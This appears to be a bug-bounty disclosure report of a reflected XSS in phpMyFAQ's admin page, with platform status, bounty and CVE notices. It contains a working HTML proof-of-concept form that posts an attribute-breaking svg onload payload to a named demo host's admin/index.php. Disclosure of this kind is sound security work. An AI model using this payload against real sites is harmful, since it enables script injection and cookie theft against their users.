Reflect XSS Which can help in any CSRF Vulnerability in thorsten/phpmyfaq
Valid
Reported on
Dec 13th 2022
Description
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.
Proof of Concept
Below HTML code for trigger XSS with POST method
<html>
<title>XSS POC By AggressiveUser</title>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://roy.demo.phpmyfaq.de/admin/index.php" method="POST">
<input type="hidden" name="redirect-action" value="AggressiveUser"><svg onload=alert(112233)>" />
<center><input type="submit" value="Click Here for Trigger XSS" />
</form>
</body>
</html>
Below BurpSuite POC

#YO Maintainer :) Long Time No SEE !
Impact
Attacker can execute javascript, Anyone can steal the cookie, redirect to any URL and other lots of FUN.
We are processing your report and will contact the
thorsten/phpmyfaq
team within 24 hours.
5 months ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
The researcher's credibility has increased: +7
Thorsten Rinne
has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on
Jan 31st 2023
Hi @admin As i can see their one message is "This vulnerability has been assigned a CVE"
But i can't find any CVE attached with this report
to join this conversation
